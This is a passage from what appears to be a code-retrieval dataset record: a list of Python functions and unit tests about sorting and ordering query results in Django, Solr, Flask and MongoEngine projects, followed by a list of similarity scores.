True\n elif (\n self.query.default_ordering\n and self.query.get_meta().ordering\n and\n # A default ordering doesn't affect GROUP BY queries.\n not self.query.group_by\n ):\n return True\n else:\n return False", "def test_sorting_by_priority(self):\n # The sorting link is presents on the page\n order_by = '?order_by=priority'\n self.client.get(reverse('hello:contacts'))\n response = self.client.get(reverse('hello:requests'))\n self.assertIn(order_by, response.content)\n\n # After click on the order_by link webrequests sorting by priority\n for i in range(5):\n self.client.get(reverse('hello:contacts'))\n\n for i in range(1, 6):\n webrequest = DatabaseRequest.objects.get(pk=i)\n webrequest.priority = i\n webrequest.save()\n\n webrequests = DatabaseRequest.objects.all()\n response = self.client.get(reverse('hello:requests')+order_by)\n webrequests = webrequests.order_by('priority')\n\n 
for i in range(5):\n self.assertEqual(response.context['requests'][i], webrequests[i])\n\n # After another click on the order_by link webrequest reversing\n response = self.client.get(reverse('hello:requests') +\n order_by+'&reverse=true')\n webrequests = webrequests.reverse()\n\n for i in range(5):\n self.assertEqual(response.context['requests'][i], webrequests[i])", "def test_sort_order(self):\n obj = self.conn.search(self.basedn, 2, attrlist=['uidNumber'],\n sort_order=[\"-uidNumber\"])\n sort = [o['uidNumber'][0] for o in obj if 'uidNumber' in o]\n self.assertTrue((all(sort[i] >= sort[i+1]\n for i in range(len(sort)-1))), \"Not sorted\")", "def test_sorting_name(self):\n # Name Decreasing sorting criteria is selected\n sorting_criteria = \"name_decreasing\"\n # Search string that returns all of the users\n search_string = \"''\"\n # Search For all users\n resp = SearchTest.client.get('/api/search/',{\"token\":SearchTest.valid_token,\"search_string\":search_string,\"sorting_criteria\":sorting_criteria})\n search_result = json.loads(resp.content)\n for i in range(len(search_result)-1):\n self.assertGreaterEqual(search_result[i][\"name\"],search_result[i+1][\"name\"],\"{} sorting criteria doesn't work\".format(sorting_criteria))", "def sort_values_descending(self, sort_values_descending):\n\n self._sort_values_descending = sort_values_descending", "def test_calc_sort_with_after_object(self):\n test_object = self.test.datum_type2\n actual = test_object._calc_sort_value(after_object=self.test.datum_type1,\n sort_base_length=3,\n increment=1,\n sort_prefix_parts=[test_object.datum_group.sort]\n )\n expected = 10101\n self.assertEqual(expected, actual)", "def test_ordering(self):\n\n class BlogPost(Document):\n title = StringField()\n published_date = DateTimeField()\n\n meta = {\"ordering\": [\"-published_date\"]}\n\n BlogPost.drop_collection()\n\n blog_post_1 = BlogPost.objects.create(\n title=\"Blog Post #1\", published_date=datetime.datetime(2010, 1, 5, 0, 0, 0)\n )\n blog_post_2 = BlogPost.objects.create(\n title=\"Blog Post #2\", published_date=datetime.datetime(2010, 1, 6, 0, 0, 0)\n )\n blog_post_3 = BlogPost.objects.create(\n title=\"Blog Post #3\", published_date=datetime.datetime(2010, 1, 7, 0, 0, 0)\n )\n\n # get the \"first\" BlogPost using default ordering\n # from BlogPost.meta.ordering\n expected = [blog_post_3, blog_post_2, blog_post_1]\n self.assertSequence(BlogPost.objects.all(), expected)\n\n # override default ordering, order BlogPosts by \"published_date\"\n qs = BlogPost.objects.order_by(\"+published_date\")\n expected = [blog_post_1, blog_post_2, blog_post_3]\n self.assertSequence(qs, expected)", "def testSortNoDbAscending(self):\n self.request.GET['sort'] = \"custom\"\n self.datagrid.load_state()\n self.assertEqual(self.datagrid.sort_list, [\"custom\"])\n self.assertEqual(len(self.datagrid.rows), self.datagrid.paginate_by)\n self.assertEqual(self.datagrid.rows[0]['object'].name, \"Group 04\")\n self.assertEqual(self.datagrid.rows[1]['object'].name, \"Group 08\")\n self.assertEqual(self.datagrid.rows[2]['object'].name, \"Group 12\")\n\n # Exercise the code paths when rendering\n self.datagrid.render_listview()", "def test_sort_reversed():\n reverse_sorted_data = [3, 2, 1]\n sorted_data = bubble_sort(reverse_sorted_data)\n assert sorted_data == [1, 2, 3]", "def test_get_entities_ten_no_filter_sort_username_desc(app, add_ten_users):\n with app.app_context():\n add_ten_users()\n users = get_entities(User, 1, 3, [], dict(column='id', dir='desc'))\n assert len(users.items) 
== 3\n assert users.items[0].id == 10\n assert users.has_next\n assert not users.has_prev\n assert users.pages == math.ceil(users.total / users.per_page)", "def test_sort_more_than_n(self):\n e1 = Experience(rid=1, uid=3, experience=100)\n e2 = Experience(rid=1, uid=1, experience=89)\n e3 = Experience(rid=1, uid=12, experience=1343)\n e4 = Experience(rid=1, uid=22, experience=1839)\n e5 = Experience(rid=1, uid=2, experience=20)\n db.session.add(e1)\n db.session.add(e2)\n db.session.add(e3)\n db.session.add(e4)\n db.session.add(e5)\n db.session.commit()\n list = top_n_in_order(1, 3)\n self.assertEqual([(22, 1839), (12, 1343), (3, 100)], list)", "def test_get_sort_value_with_after_object(self):\n test_object = self.test.datum_type2\n actual = test_object.get_sort_value(after_object=self.test.datum_type1)\n expected = 10101\n self.assertEqual(expected, actual)", "def _orderby_expression(self):\n return ''", "def sortby(self):\n return self._sortby", "def test_get_activities_order_sorted_by_last_comment_publish_date(self):\n from .mockers import user_comment\n from .mockers import user_status_context\n from .mockers import subscribe_context, create_context\n from .mockers import context_query\n\n username = 'messi'\n self.create_user(username)\n self.create_context(create_context)\n self.admin_subscribe_user_to_context(username, subscribe_context)\n activity_0_id = self.create_activity(username, user_status_context).json['id']\n activity_1_id = self.create_activity(username, user_status_context).json['id']\n activity_2_id = self.create_activity(username, user_status_context).json['id']\n res = self.testapp.post('/activities/%s/comments' % str(activity_1_id), json.dumps(user_comment), oauth2Header(username), status=201)\n\n res = self.testapp.get('/contexts/%s/activities?sortBy=activities' % (context_query['context']), '', oauth2Header(username), status=200)\n self.assertEqual(len(res.json), 3)\n self.assertEqual(res.json[0].get('id', None), activity_2_id)\n self.assertEqual(res.json[1].get('id', None), activity_1_id)\n self.assertEqual(res.json[2].get('id', None), activity_0_id)", "def test_entities__EntityOrder__isLast__2(entityOrder):\n assert not entityOrder.isLast(IEntity(IPhoneNumber))", "def test_get_tag_order_by(self):\n tag = \"pod_labels__key\"\n expected_param = (tag.split(\"__\")[1],)\n\n url = \"?\"\n query_params = self.mocked_query_params(url, OCPCpuView)\n handler = OCPReportQueryHandler(query_params)\n result = handler.get_tag_order_by(tag)\n expression = result.expression\n\n self.assertIsInstance(result, OrderBy)\n self.assertEqual(expression.sql, \"pod_labels -> %s\")\n self.assertEqual(expression.params, expected_param)", "def order_by(cls, *args):\n return cls.query.order_by(*args)", "def test_sorting_name2(self):\n # Name Decreasing sorting criteria is selected\n sorting_criteria = \"name_increasing\"\n # Search string that returns all of the users\n search_string = \"''\"\n # Search For all users\n resp = SearchTest.client.get('/api/search/',{\"token\":SearchTest.valid_token,\"search_string\":search_string,\"sorting_criteria\":sorting_criteria})\n search_result = json.loads(resp.content)\n for i in range(len(search_result)-1):\n self.assertLessEqual(search_result[i][\"name\"],search_result[i+1][\"name\"],\"{} sorting criteria doesn't work\".format(sorting_criteria))", "def test_sorting_album_year_time_added(self):\n self.add_mp3(artist='Artist', title='Title 1',\n album='Album 1', year=2017, filename='song1.mp3')\n self.add_mp3(artist='Artist', title='Title 2',\n 
album='Album 2', year=2017, filename='song2.mp3')\n self.run_add()\n al2 = self.age_album('Artist', 'Album 2', 10)\n self.assertEqual(Album.objects.count(), 2)\n\n albums = [\n al2,\n Album.objects.get(name='Album 1'),\n ]\n artist = Artist.objects.get(name='Artist')\n\n response = self.client.get(reverse('exordium:artist', args=(artist.normname,)), {'album-sort': 'year'})\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context['albums'].data), 2)\n self.assertQuerysetEqual(response.context['albums'].data, [repr(al) for al in albums])\n self.assertContains(response, '\"?album-sort=-year\"')\n\n # test reverse sort\n response = self.client.get(reverse('exordium:artist', args=(artist.normname,)), {'album-sort': '-year'})\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context['albums'].data), 2)\n self.assertQuerysetEqual(response.context['albums'].data, [repr(al) for al in reversed(albums)])\n self.assertContains(response, '\"?album-sort=year\"')", "def test_sort(self):\n expected = [\n self.TDTT(when=self.dt_when - (3*self.SORT_DELTA)),\n self.TDTT(when=self.dt_when - self.SORT_DELTA),\n self.TDTT(when=self.dt_when),\n self.TDTT(when=self.dt_when + self.SORT_DELTA),\n self.TDTT(when=self.dt_when + (2*self.SORT_DELTA)),\n ]\n self.assertTrue(self.is_sorted_ascending_by_when(expected))\n\n unsorted = [\n expected[3], expected[2], expected[4], expected[1], expected[0],\n ]\n self.assertFalse(self.is_sorted_ascending_by_when(unsorted))\n self.assertNotEquals(\n [str(dt) for dt in expected],\n [str(dt) for dt in unsorted])\n\n now_sorted = self.TDTT.sort(unsorted)\n self.assertTrue(self.is_sorted_ascending_by_when(now_sorted))\n self.assertEquals(\n [str(dt) for dt in expected],\n [str(dt) for dt in now_sorted])", "def is_not_in_descending_order(a):\n for i in range(len(a) - 1):\n if a[i] > a[i + 1]:\n return False\n return True", "def test_sorting_surname2(self):\n # Name Decreasing sorting criteria is selected\n sorting_criteria = \"surname_decreasing\"\n # Search string that returns all of the users\n search_string = \"''\"\n # Search For all users\n resp = SearchTest.client.get('/api/search/',{\"token\":SearchTest.valid_token,\"search_string\":search_string,\"sorting_criteria\":sorting_criteria})\n search_result = json.loads(resp.content)\n for i in range(len(search_result)-1):\n self.assertGreaterEqual(search_result[i][\"name\"],search_result[i+1][\"name\"],\"{} sorting criteria doesn't work\".format(sorting_criteria))", "def test_get_movies_order_by_rating(self):\n\n r = self.client.get(reverse('movieapi:movies'), {'order_by': 'rating'})\n\n qs = Movie.get_all().order_by('imdbrating')\n serializer = MovieSerializer(qs, many=True)\n\n self.assertJSONEqual(\n r.content,\n serializer.data\n )\n self.assertEqual(r.status_code, 200)", "def test_ordering(post_factory):\n now = timezone.now()\n\n p1 = post_factory(published=now - datetime.timedelta(hours=1))\n p2 = post_factory(published=now + datetime.timedelta(hours=1))\n p3 = post_factory(published=now)\n\n assert list(models.Post.objects.all()) == [p2, p3, p1]", "def order_by(self, results, key_, direction=\"ASC\"):\n\n return sorted(results, key=lambda x: x.get(key_), reverse=direction==\"DESC\")", "def test_query_sort_default_sort_order(self):\n doc_count = 10\n field_to_be_sorted_by = \"data\"\n prefix = get_rand_string()\n\n data = [prefix + \"-\" + str(x) for x in range(10)]\n\n # Same user_id for all documents\n user_id = get_rand_string()\n\n for datum in data:\n 
self.conn.add(id=get_rand_string(), user_id=user_id, data=datum)\n self.conn.commit()\n\n results = self.conn.query(q=\"user_id:\" + user_id, sort=\"data\").results\n\n self.assertEquals(len(results), doc_count,\n \"There should be %d documents returned, got:%d, results:%s\" % (\n doc_count, len(results), results))\n\n query_data = [doc[\"data\"] for doc in results]\n\n for idx, datum in enumerate(sorted(data)):\n self.assertEquals(datum, query_data[idx],\n \"Expected %s instead of %s on position %s in query_data:%s\" % (\n datum, query_data[idx], idx, query_data))", "def test_entities__EntityOrder__isLast__1(entityOrder):\n assert entityOrder.isLast(IEntity(IKeyword))", "def is_not_in_descending_order(a):\n for i in range(len(a)-1):\n if a[i] > a[i+1]:\n return False\n return True", "def order_by(self, *fields):\n self.query = self.query.sort(self._parse_order_spec(fields))\n return self", "def test_returns_sorted_projects_by_priority_if_sort_by_set_to_priority(self):\n # Arrange\n # Set priority of test_project_1 to urgent.\n self.test_project_1.priority = ProjectPriority.URGENT.value\n self.test_project_1.save()\n # Set project_2 to be allowed for all users removing as private.\n self.test_project_2.private = False\n self.test_project_2.priority = ProjectPriority.HIGH.value\n self.test_project_2.save()\n # Set priority of test_project_1 to low and status to published.\n self.test_project_3.status = ProjectStatus.PUBLISHED.value\n self.test_project_3.priority = ProjectPriority.MEDIUM.value\n self.test_project_3.save()\n test_project_4 = Project.clone(self.test_project_2.id, self.test_author.id)\n test_project_4.status = ProjectStatus.PUBLISHED.value\n test_project_4.priority = ProjectPriority.LOW.value\n test_project_4.save()\n\n # Test for descending order\n # Act\n response_desc = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"orderBy\": \"priority\", \"orderByType\": \"DESC\"},\n )\n # Assert\n self.assertEqual(response_desc.status_code, 200)\n self.assertEqual(len(response_desc.json[\"results\"]), 4)\n expected_desc_order = [\n test_project_4.id,\n self.test_project_3.id,\n self.test_project_2.id,\n self.test_project_1.id,\n ]\n self.assertListEqual(\n [i[\"projectId\"] for i in response_desc.json[\"results\"]], expected_desc_order\n )\n\n # Test for ascending order\n # Act\n response_asc = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"orderBy\": \"priority\", \"orderByType\": \"ASC\"},\n )\n # Assert\n self.assertEqual(response_asc.status_code, 200)\n self.assertEqual(len(response_asc.json[\"results\"]), 4)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_asc.json[\"results\"]],\n expected_desc_order[::-1],\n )", "def test_get_entities_note_no_filter_default_sort(app):\n with app.app_context():\n notes = get_entities(Note, 1, 5)\n assert notes.page == 1\n assert notes.per_page == 5\n assert 'ORDER BY notes.id ASC' in str(notes.query.statement)\n assert notes.query.whereclause is None", "def test_reverse_sort_lines(self):\n before_b = \"\"\"\\\n a\n d\n e\n z\n x\n \"\"\"\n after_b = \"\"\"\\\n z\n x\n e\n d\n a\n \"\"\"\n self.run_test(\n before_b=before_b,\n after_b=after_b,\n before_sel=(\"1.0\", \"5.1\"),\n after_sel=(\"1.0\", \"5.1\"),\n command_name=\"reverse-sort-lines\",\n )", "def test_latest_stories_ordering_after_on_homepage_toggle(self):\n user = User.objects.create_user(username='test',\n email='[email protected]',\n password='password')\n # 
Create some stories\n story1 = create_story(title=\"Test Featured Story\", \n summary=\"Test summary\", byline=\"Test byline\", \n author=user, status='published', on_homepage=True)\n story2 = create_story(title=\"Test Story 2\", \n summary=\"Test summary\", byline=\"Test byline\", \n author=user, status='published')\n story3 = create_story(title=\"Test Story 3\", \n summary=\"Test summary\", byline=\"Test byline\", \n author=user, status='published')\n story4 = create_story(title=\"Test Story 4\", \n summary=\"Test summary\", byline=\"Test byline\", \n author=user, status='published')\n\n # Render the latest story list\n t = Template(\"{% load story %}{% latest_stories %}\")\n c = Context()\n rendered = t.render(c)\n\n # Stories 2, 3, and 4 should be in the rendered output because\n # they're the most recently published\n self.assertNotIn(story1.title, rendered)\n self.assertIn(story2.title, rendered)\n self.assertIn(story3.title, rendered)\n self.assertIn(story4.title, rendered)\n\n # Toggle the ``on_homepage`` flag of story1\n story1.on_homepage = False\n story1.save()\n\n # Re-render the template and confirm that the first story still\n # doesn't appear in the latest stories list. Even though it's\n # last-updated date is changed when the ``on_homepage`` flag is\n # updated, the ``weight`` field, used to generate the latest\n # stories list shouldn't be affected.\n rendered = t.render(c)\n self.assertNotIn(story1.title, rendered)\n self.assertIn(story2.title, rendered)\n self.assertIn(story3.title, rendered)\n self.assertIn(story4.title, rendered)", "def assert_response_orders(self, *args, **kwargs):\n self.assert_response_order(*args, **kwargs)\n kwargs['order_by'] = '-' + kwargs['order_by']\n self.assert_response_order(*args, **kwargs)", "def ordering(self):\r\n if hasattr(self, \"queryset\"):\r\n aliases = {}\r\n for bound_column in self.table.columns:\r\n aliases[bound_column.order_by_alias] = bound_column.order_by\r\n try:\r\n return next(segment(self.queryset.query.order_by, aliases))\r\n except StopIteration:\r\n pass", "def test_get_entities_user_no_filter_default_sort(app):\n with app.app_context():\n users = get_entities(User, 1, 5)\n assert users.page == 1\n assert users.per_page == 5\n assert 'ORDER BY users.id ASC' in str(users.query.statement)\n assert users.query.whereclause is None", "def test_returns_sorted_projects_by_last_updated_date_if_sort_by_set_to_updated_at(\n self,\n ):\n # Arrange\n self.test_project_1.last_updated = datetime.utcnow() - timedelta(days=1)\n # Set project_2 to be allowed for all users removing as private.\n self.test_project_2.last_updated = datetime.utcnow() - timedelta(days=2)\n self.test_project_2.private = False\n self.test_project_2.save()\n # Set status of test_project_3 to published.\n self.test_project_3.last_updated = datetime.utcnow() - timedelta(days=3)\n self.test_project_3.status = ProjectStatus.PUBLISHED.value\n self.test_project_3.save()\n\n # Test returns sorted projects by last_updated_in descending order.\n # Act\n response_desc = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"orderBy\": \"last_updated\", \"orderByType\": \"DESC\"},\n )\n # Assert\n self.assertEqual(response_desc.status_code, 200)\n self.assertEqual(len(response_desc.json[\"results\"]), 3)\n expected_desc_order = [\n self.test_project_1.id,\n self.test_project_2.id,\n self.test_project_3.id,\n ]\n self.assertListEqual(\n [i[\"projectId\"] for i in response_desc.json[\"results\"]], expected_desc_order\n 
)\n\n # Test returns sorted projects by last_updated_in ascending order.\n # Act\n response_asc = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"orderBy\": \"last_updated\", \"orderByType\": \"ASC\"},\n )\n # Assert\n self.assertEqual(response_asc.status_code, 200)\n self.assertEqual(len(response_asc.json[\"results\"]), 3)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_asc.json[\"results\"]],\n expected_desc_order[::-1],\n )", "def get_sort_string(sort_column, sort_descending):\n if sort_column:\n sort_descending_string = \"desc\" if sort_descending else \"\"\n return \" ORDER BY %s %s\" % (sort_column, sort_descending_string) \n return \"\"", "def test_last_sort_value_with_sort_range(self):\n test_object = self.test.datum_type2\n actual = test_object._last_sort_value(10000, 10999)\n expected = 10100\n self.assertEqual(expected, actual)", "def extra_order_by_datetime_of_last_admin_comment(self, descending=False):\n if descending:\n order_by = ['-datetime_of_last_admin_comment']\n else:\n order_by = ['datetime_of_last_admin_comment']\n return self.extra_annotate_datetime_of_last_admin_comment().extra(\n order_by=order_by\n )", "def get_sort_query(self, kind, order, is_number):\n pass", "def assert_response_order(self, query, query_name, order_by, queries_count, model,\n get_value_instance, get_value_result):\n with self.assertNumQueries(queries_count):\n result = self.execute(query, dict(order=order_by))\n\n self.assertEqual(len(result[query_name]['edges']), self.count)\n self.assertNotEqual(get_value_result(result[query_name]['edges'][0]['node']),\n get_value_result(result[query_name]['edges'][self.count - 1]['node']))\n for i, instance in enumerate(model.objects.order_by(order_by)):\n self.assertEqual(get_value_result(result[query_name]['edges'][i]['node']), get_value_instance(instance))", "def test_entities__EntityOrder__isLast__4(entityOrder, minimalEntity):\n with pytest.raises(KeyError):\n entityOrder.isLast(minimalEntity)" ]
[ "0.68660283", "0.6728724", "0.6677009", "0.6650034", "0.65972036", "0.6469477", "0.64451", "0.6346018", "0.62945986", "0.62910104", "0.6286649", "0.6240998", "0.6212203", "0.619569", "0.618064", "0.61099553", "0.6034809", "0.5979432", "0.59784126", "0.59772485", "0.59331065", "0.592605", "0.59114116", "0.5900148", "0.5862058", "0.5830494", "0.58214355", "0.5703398", "0.5688422", "0.5684228", "0.5677334", "0.5675856", "0.56615275", "0.56508607", "0.5644567", "0.56298363", "0.5619091", "0.5597022", "0.5588665", "0.5548565", "0.5536525", "0.55330235", "0.5516477", "0.55136627", "0.55104786", "0.5503466", "0.549149", "0.548737", "0.54776293", "0.54768604", "0.54646045", "0.54639095", "0.5457084", "0.5447026", "0.5444988", "0.54449594", "0.5443586", "0.5442919", "0.54187095", "0.5404832", "0.5387478", "0.5385042", "0.5380504", "0.536984", "0.5367443", "0.5355222", "0.5340481", "0.5323927", "0.5322839", "0.5315017", "0.5310365", "0.53043884", "0.529854", "0.5282066", "0.5274263", "0.52737534", "0.5262082", "0.5262029", "0.52470845", "0.5246928", "0.5238138", "0.5236436", "0.5232487", "0.5231778", "0.52263534", "0.5216037", "0.51969486", "0.519619", "0.51911336", "0.5182202", "0.51799077", "0.5169249", "0.51488024", "0.51459885", "0.5140952", "0.5139586", "0.51322526", "0.51253074", "0.51080066", "0.5104027" ]
0.6622364
4
Set the `order_by_field` on the filterset and ensure that the field name is respected.
def test_ordering_with_overridden_field_name(self):
    class F(FilterSet):
        class Meta:
            model = User
            fields = ['username', 'status']
            order_by = ['status']
            order_by_field = 'order'

    f = F().form
    self.assertNotIn('o', f.fields)
    self.assertIn('order', f.fields)
    self.assertEqual(f.fields['order'].choices, [('status', 'Status')])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_ordering_with_overridden_field_name(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = ['status']\n order_by_field = 'order'\n\n f = F({'order': 'status'}, queryset=self.qs)\n self.assertQuerysetEqual(\n f.qs, ['carl', 'alex', 'jacob', 'aaron'], lambda o: o.username)", "def test_ordering_with_overridden_field_name_and_descending(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = ['status', '-status']\n order_by_field = 'order'\n\n f = F().form\n self.assertNotIn('o', f.fields)\n self.assertIn('order', f.fields)\n self.assertEqual(f.fields['order'].choices, [('status', 'Status'), ('-status', 'Status (descending)')])", "def order_by(self, order_by):\n\n self._order_by = order_by", "def set_sort_by(self, sort_by):\n\n\t\tif sort_by is not None and not isinstance(sort_by, str):\n\t\t\traise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: sort_by EXPECTED TYPE: str', None, None)\n\t\t\n\t\tself.__sort_by = sort_by\n\t\tself.__key_modified['sort_by'] = 1", "def user_order_by(self, field):\n # Get ordering model.\n model_label = order.utils.resolve_labels('.'.join(\\\n [self.model._meta.app_label, self.model._meta.object_name]))\n orderitem_set = getattr(self.model, \\\n order.utils.resolve_order_item_related_set_name(model_label))\n order_model = orderitem_set.related.model\n\n # Resolve ordering model table name.\n db_table = order_model._meta.db_table\n\n # Add ordering field as extra queryset fields.\n pk_name = self.model._meta.pk.attname\n\n # If we have a descending query remove '-' from field name when quering.\n sanitized_field = field.lstrip('-')\n\n extra_select = {\n sanitized_field: '(SELECT %s from %s WHERE item_id=%s.%s)' % \\\n (sanitized_field, db_table, self.model._meta.db_table, pk_name)\n }\n\n # Use original field name when ordering to allow for descending.\n return self.extra(select=extra_select).all().order_by(field)", "def order_queryset(self, queryset):\n if ordering := self.request.query_params.get(\"ordering\"):\n order_by = []\n regex = re.compile(r\"-?annotations__(?P<field_id>\\d+)\")\n fields = [field.strip() for field in ordering.split(\",\")]\n for match in filter(None, map(regex.match, fields)):\n field_id = match.group(\"field_id\")\n annotation_value = AnnotationValue.objects.filter(\n entity_id=OuterRef(\"pk\"), field_id=field_id\n ).values(\"_value__value\")\n annotate = {f\"_order_{field_id}\": Subquery(annotation_value)}\n queryset = queryset.annotate(**annotate)\n sign = \"-\" if match.string.startswith(\"-\") else \"\"\n order_by.append(f\"{sign}_order_{field_id}\")\n if order_by:\n queryset = queryset.order_by(*order_by)\n return queryset", "def order_by(self, *field_names):\n qs = copy(self)\n qs._order_by = field_names\n return qs", "def order_by(self, field_paths, order=None):\n raise NotImplementedError(\"This should have been implemented.\")", "def order_by(self, *fields):\n self.query = self.query.sort(self._parse_order_spec(fields))\n return self", "def sortby(self, sortby):\n self._sortby = sortby", "def sort_queryset(\n queryset: QuerySet, sort_by: SortInputObjectType, reversed: bool\n) -> QuerySet:\n sorting_direction = sort_by.direction\n if reversed:\n sorting_direction = REVERSED_DIRECTION[sorting_direction]\n\n sorting_field = sort_by.field\n sorting_attribute = getattr(sort_by, \"attribute_id\", None)\n\n if sorting_field is not None and sorting_attribute is not None:\n raise GraphQLError(\n \"You must provide either 
`field` or `attributeId` to sort the products.\"\n )\n elif sorting_attribute is not None: # empty string as sorting_attribute is valid\n return _sort_queryset_by_attribute(\n queryset, sorting_attribute, sorting_direction\n )\n\n sort_enum = sort_by._meta.sort_enum\n sorting_fields = sort_enum.get(sorting_field)\n sorting_field_name = sorting_fields.name.lower()\n\n custom_sort_by = getattr(sort_enum, f\"qs_with_{sorting_field_name}\", None)\n if custom_sort_by:\n queryset = custom_sort_by(queryset)\n\n sorting_field_value = sorting_fields.value\n sorting_list = [f\"{sorting_direction}{field}\" for field in sorting_field_value]\n\n return queryset.order_by(*sorting_list)", "def get_queryset(self):\n qs = super(SortForm, self).get_queryset()\n\n qs = self.pre_sort(qs)\n\n # Ensure that the form is valid\n if not self.is_valid():\n return qs\n\n # Do Sorting\n sorts = self.cleaned_data.get('sort', [])\n order_by = []\n for sort in sorts:\n param = self.HEADERS[abs(sort) - 1]['column']\n if sort < 0:\n param = '-' + param\n order_by.append(param)\n\n if order_by:\n qs = qs.order_by(*order_by)\n\n qs = self.post_sort(qs)\n\n return qs", "def order_by(self, *field_names):\n assert self.query.can_filter(), \\\n \"Cannot reorder a query once a slice has been taken.\"\n\n clone = self._clone()\n for field_name in field_names:\n clone.query.order_by.append(field_name)\n return clone", "def test_ordering_descending_unset(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = True\n\n f = F({'o': '-username'}, queryset=self.qs)\n self.assertQuerysetEqual(\n f.qs, ['jacob', 'carl', 'alex', 'aaron'], lambda o: o.username)", "def order_by(self, value):\r\n # collapse empty values to ()\r\n order_by = () if not value else value\r\n # accept string\r\n order_by = order_by.split(',') if isinstance(order_by, six.string_types) else order_by\r\n valid = []\r\n # everything's been converted to a iterable, accept iterable!\r\n for alias in order_by:\r\n name = OrderBy(alias).bare\r\n if name in self.columns and self.columns[name].orderable:\r\n valid.append(alias)\r\n self._order_by = OrderByTuple(valid)\r\n self.data.order_by(self._order_by)", "def filter_and_order(cls, *args, **kwargs):\n return cls.query.filter_by(**kwargs).order_by(*args)", "def clean_order_by(self):\n\t\tresult = None\n\t\tmap_id = self.cleaned_data.get('order_by', '')\n\t\tif self._ORDER_BY_MAP.has_key(map_id):\n\t\t\tresult = self._ORDER_BY_MAP.get(map_id)\n\t\telse:\n\t\t\tresult = self._ORDER_BY_MAP.values()[0]\n\t\treturn result", "def sort_by(self, sort_direction: epl_imagery_pb2.SortDirection):\n # TODO if you want to sort by multiple parameters, then this class will have to have a pointer to the filter\n if self.metadata_filters.sorted_by:\n self.metadata_filters.sorted_by.query_params.sort_direction = epl_imagery_pb2.NOT_SORTED\n\n self.metadata_filters.sorted_by = self\n\n # class that contains it, and upon updating this class there is a call back to the container class to insert\n # this parameter in a list\n self.query_params.sort_direction = sort_direction\n self.b_initialized = True", "def order_by(self, *fields):\n self._evaluated = False\n if self._order is None:\n self._order = []\n\n for field in fields:\n direction = \"asc\"\n if field.startswith('-'):\n direction = \"desc\"\n field = field[1:]\n\n self._order.append({ field : direction })\n\n return self", "def orderby(cls, field, desc=False):\n cls.runtime.set_orderby((field, desc))\n return cls", "def order_by(self, 
field_name, direction=ASCENDING):\n\n from jetengine.fields.base_field import BaseField\n from jetengine.fields.list_field import ListField\n\n if isinstance(field_name, (ListField,)):\n raise ValueError(\n \"Can't order by a list field. If you meant to order by the size of the list, please use either an Aggregation Pipeline query (look for Document.objects.aggregate) or create an IntField with the size of the list field in your Document.\"\n )\n\n if isinstance(field_name, (BaseField,)):\n field_name = field_name.name\n\n if field_name not in self.__klass__._fields:\n raise ValueError(\n \"Invalid order by field '%s': Field not found in '%s'.\" % (field_name, self.__klass__.__name__)\n )\n\n field = self.__klass__._fields[field_name]\n self._order_fields.append((field.db_field, direction))\n return self", "def pre_sort(self, qs):\n return qs", "def ordering(self, qs):\n request = self.request\n # Number of columns that are used in sorting\n try:\n i_sorting_cols = int(request.REQUEST.get('iSortingCols', 0))\n except ValueError:\n i_sorting_cols = 0\n\n order = []\n order_columns = self.get_order_columns()\n for i in range(i_sorting_cols):\n # sorting column\n try:\n i_sort_col = int(request.REQUEST.get('iSortCol_%s' % i))\n except ValueError:\n i_sort_col = 0\n # sorting order\n s_sort_dir = request.REQUEST.get('sSortDir_%s' % i)\n\n sdir = '-' if s_sort_dir == 'desc' else ''\n\n sortcol = order_columns[i_sort_col]\n if isinstance(sortcol, list):\n for sc in sortcol:\n order.append('%s%s' % (sdir, sc))\n else:\n order.append('%s%s' % (sdir, sortcol))\n if order:\n return qs.order_by(*order)\n return qs", "def ordering(self):\r\n if hasattr(self, \"queryset\"):\r\n aliases = {}\r\n for bound_column in self.table.columns:\r\n aliases[bound_column.order_by_alias] = bound_column.order_by\r\n try:\r\n return next(segment(self.queryset.query.order_by, aliases))\r\n except StopIteration:\r\n pass", "def order_by(self, field, descending=False):\n self._order_by.append((field, descending))\n return self", "def orderby():\n pass", "def order_by(self, *field_names):\n if self.query.is_sliced:\n raise TypeError(\"Cannot reorder a query once a slice has been taken.\")\n obj = self._chain()\n obj.query.clear_ordering(force=True, clear_default=False)\n obj.query.add_ordering(*field_names)\n return obj", "def get_sort_field(self, kind, order, is_number):\n pass", "def order(self, field, direction=Order.ASC):\n if field == 'id':\n field = '_id'\n\n self._order_by.append((field, direction))\n\n return self", "def sortby(self):\n ...", "def get_sort_by(self):\n\n\t\treturn self.__sort_by", "def get_queryset(self):\n rs = super(BaseQuerysetMixin, self).get_queryset()\n if self.request.GET.get(\"ordering\") is None:\n rs = rs.order_by(\"id\")\n return rs", "def get_sort_by(self) -> SortField:\n if hasattr(self, \"json\") and isinstance(self.json, dict):\n sort_by_str = self.json.get(\"sort_by\", \"relevance\")\n if SortField.is_sort_field(sort_by_str):\n return SortField.from_str(sort_by_str)\n return SortField.relevance", "def __order_queryset(self, queryset):\n if self.get_paginate_by(queryset) and \\\n self.request.method == \"POST\" and self.__has_initially_selected_items():\n current_order_by = list(queryset.query.order_by)\n whenqueries = []\n max_index = 0\n for index, value in enumerate(self.get_selected_values_queryset().order_by(*current_order_by)):\n whenqueries.append(models.When(pk=value.pk, then=models.Value(index)))\n max_index = index\n queryset = queryset.annotate(\n 
